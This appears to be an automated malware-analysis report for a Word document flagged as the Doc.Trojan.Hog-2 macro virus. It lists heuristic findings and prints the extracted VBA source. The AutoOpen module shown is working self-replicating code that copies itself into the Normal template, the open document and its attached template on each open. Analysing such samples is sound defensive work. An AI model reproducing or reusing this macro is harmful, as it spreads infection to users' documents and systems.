MALICIOUS
168
Risk Score
Heuristics 5
-
ClamAV: Doc.Trojan.Hog-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hog-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.OrganizerCopy Source:=mac$, _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2323 bytes |
SHA-256: 0d28178a429ab443cbb7b23db9e9cabc0d4360a40955a9d2354071210c6ae401 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoNew"
Rem Del
Rem Del
Rem Del
Rem Del
Rem Del
Rem Deleted b
Sub main()
Rem Deleted by AVP D
Rem Deleted by AVP D
Rem
Rem Deleted
Rem Deleted by AVP Delet
Rem Deleted
Rem Deleted by AVP Delet
Rem Deleted
Rem Deleted by AVP Delet
Rem Deleted
Rem Del
Rem Deleted by AVP D
End
Rem Deleted by AV
Rem Deleted by AVP Deleted by AVP Deleted by AVP Deleted
Rem Deleted by AVP Deleted by AVP Deleted by AVP Deleted
Rem Deleted by AVP Deleted by AVP Deleted by AVP Deleted
Rem Delet
Rem Delet
End Sub
Attribute VB_Name = "AutoOpen"
Dim nor$
Dim doc$
Dim tem$
Dim mac$
Dim em
Dim ar$(2)
Sub main()
ar$(1) = "AutoNew"
ar$(2) = "AutoOpen"
On Error Resume Next
With ActiveDocument
For i = 1 To .Sections.Count
With .Sections(i)
For j = 0 To .Headers.Count
Next j
End With
Next i
End With
mac$ = MacroContainer.Path
mac$ = mac$ & "\" & MacroContainer.Name
nor$ = NormalTemplate.Path
nor$ = nor$ & "\" & NormalTemplate.Name
doc$ = ActiveDocument.Path
doc$ = doc$ & "\" & ActiveDocument.Name
With ActiveDocument.AttachedTemplate
tem$ = .Path
tem$ = tem$ & "\" & .Name
End With
For n% = 1 To 2
Application.OrganizerCopy Source:=mac$, _
Destination:=nor$, Name:=ar$(n%), _
Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=mac$, _
Destination:=ActiveDocument, Name:=ar$(n%), _
Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=mac$, _
Destination:=tem$, Name:=ar$(n%), _
Object:=wdOrganizerObjectProjectItems
Next n%
ActiveDocument.Save
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.